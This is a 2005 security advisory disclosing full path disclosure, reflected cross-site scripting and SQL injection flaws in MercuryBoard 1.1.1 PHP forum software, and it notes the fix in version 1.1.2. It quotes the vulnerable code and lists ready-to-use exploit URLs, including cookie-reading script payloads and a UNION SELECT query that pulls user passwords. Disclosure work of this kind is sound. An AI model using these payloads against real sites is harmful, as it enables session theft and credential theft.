Multiple vulnerabilities in MercuryBoard 1.1.1

2005-01-25T00:00:00
ID SECURITYVULNS:DOC:7673
Type securityvulns
Reporter Securityvulns
Modified 2005-01-25T00:00:00

Description


  • CODEBUG Labs
  • Advisory #7
  • Title: Multiple vulnerabilities in MercuryBoard 1.1.1
  • Author: Alberto Trivero
  • English Version: Alberto Trivero
  • Product: MercuryBoard 1.1.1
  • Type: Multiple Vulnerabilities
  • Web: http://www.codebug.org/

--) Software Page (www.mercuryboard.com)

"MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services." Note that is write in PHP OOP.

--) Full Path Disclosure

Let's look at original code from global.php line 604:

<? ... // some base variables $current = ceil($min / $num); $string = null; $pages = ceil($rows / $num); $end = ($pages - 1) * $num; ... ?>

As we can see there isn't a control to $num and so if we simply assign to $num the value 0 (or a not numerical argument), there will be an impossible division by zero that show the full path:

http://www.sitewithmercuryboard.com/index.php?a=forum&f=2&min=0&n=0

Other Full Path Disclosure:

http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_bar.php
http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_log.php
http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_polar.php
http://www.sitewithmercuryboard.com/admincp/admin.php
http://www.sitewithmercuryboard.com/func/[file] &lt;--- All the PHP file in

the dyrectory: active.php board.php constants.php cp.php debug.php email.php forum.php help.php login.php members.php mod.php pm.php post.php printer.php profile.php register.php search.php topic.php

--) Cross-Site Scripting (XSS)

Let's look at original code from /func/pm.php line 36:

<? ... if (!isset($this->get['s'])) { $this->get['s'] = null; } switch($this->get['s']) { case 'send': return $this->send(); break; case 'view': return $this->view(); break; case 'delete': return $this->delete_pm(); break; case 'clear': return $this->clear(); break; default: return $this->folder(); break; } ... ?>

As we can see there is a switch/case cycle to get 's' but in this cycle there isn't any check if we put other parameter with 's', like this XSS code:

http://www.sitewithmercuryboard.com/index.php?a=pm&s='><script>alert(document.cookie)</script>

Let's look again at original code from /func/members.php line 35:

<? ... if (!isset($this->get['l'])) { $this->get['l'] = null; } else { $this->get['l'] = strtoupper($this->get['l']); } ... ?>

As we can see, also in this case, there isn't parsing methods for the processing of 'l', so nothing can prevent us from doing an XSS attack:

http://www.sitewithmercuryboard.com/index.php?a=members&l='><script>alert(document.cookie)</script>

Other Cross-Site Scripting:

http://www.sitewithmercuryboard.com/index.php?a='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=post&s='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=cp&s='><script>alert(document.cookie)</script>

--) SQL Injection

For the same reason because it's possible to execute the XSS codes described before, it's also possible to do SQL Injection attacks. But in this case it's a non-critical bug, why? Because we need first login as forum administrator to make successful attack. For example:

http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*

With the URL before we get, for the just described reason, an error like this (verified only on MercuryBoard 1.1.0):

The used SELECT statements have a different number of columns

--) Patch

After the report to developer of the board of these bugs, they released the version 1.1.2 of MercuryBoard that correct them: http://www.mercuryboard.com/index.php?a=downloads


    http://www.codebug.org